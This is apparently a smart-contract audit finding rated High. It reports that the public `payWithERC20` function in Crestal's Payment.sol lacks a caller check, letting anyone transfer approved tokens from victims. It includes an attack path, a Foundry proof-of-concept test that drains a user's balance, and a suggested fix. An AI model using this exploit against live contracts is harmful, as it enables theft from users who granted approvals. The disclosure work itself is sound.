Spicy Banana Cuckoo

High

# Unauthorized Token Transfers Due to Missing Caller Verification in PayWithErc20 function

### Summary


There is a missing caller verification in `payWithERC20` which will cause an unauthorized token transfer for users as an attacker will call the function to transfer tokens from any approved user to themselves.

### Root Cause


In `Payment.sol`, the `payWithERC20` [function](https://github.com/sherlock-audit/2025-03-crestal-network/blob/main/crestal-omni-contracts/src/Payment.sol#L25) is public and it lacks proper caller verification, allowing anyone to initiate transfers on behalf of users who have given approval to the contract.


### Internal Pre-conditions

1. A user needs to approve the contract to spend their ERC20 tokens (either an unlimited or excess approval).
2. The user's ERC20 token balance must be at least the amount specified in the attack.


### External Pre-conditions


None.

### Attack Path

1. A user approves the `Payment` contract to spend their ERC20 tokens.
2. An attacker calls `payWithERC20(address(erc20Token), amount, victimAddress, attackerAddress)`.
3. Since the contract does not check `msg.sender`, it allows the attacker to transfer tokens from the victim to themselves.
4. The attacker successfully steals the victim’s tokens.


### Impact


The affected users suffer a **complete loss of approved tokens**, as an attacker can drain their balance if they have given excessive or unlimited approvals to the contract.


### PoC


```solidity
function test_steal_user_token_upon_approval() public {
    address user = makeAddr("user");
    address attacker = makeAddr("attacker");
    deal(address(mockToken), user, 10000e18);
    vm.startPrank(user);
    mockToken.approve(address(blueprint), type(uint).max);
    vm.stopPrank();

    console.log("balance of user before attack:", mockToken.balanceOf(user));
    console.log("balance of attacker before attack:", mockToken.balanceOf(attacker));

    // try to steal tokens here
    vm.startPrank(attacker);
    blueprint.payWithERC20(address(mockToken), mockToken.balanceOf(user), user, attacker);
    vm.stopPrank();
    console.log("balance of user after attack:", mockToken.balanceOf(user));
    console.log("balance of attacker after attack:", mockToken.balanceOf(attacker));

    assertEq(mockToken.balanceOf(attacker), 10000e18);
}
```

### Mitigation

Add a check to ensure only authorised callers can execute `payWithERC20`, such as using `msg.sender == fromAddress` or implementing access control. And if its not intended to be used publicly, just change the visibility to internal/private.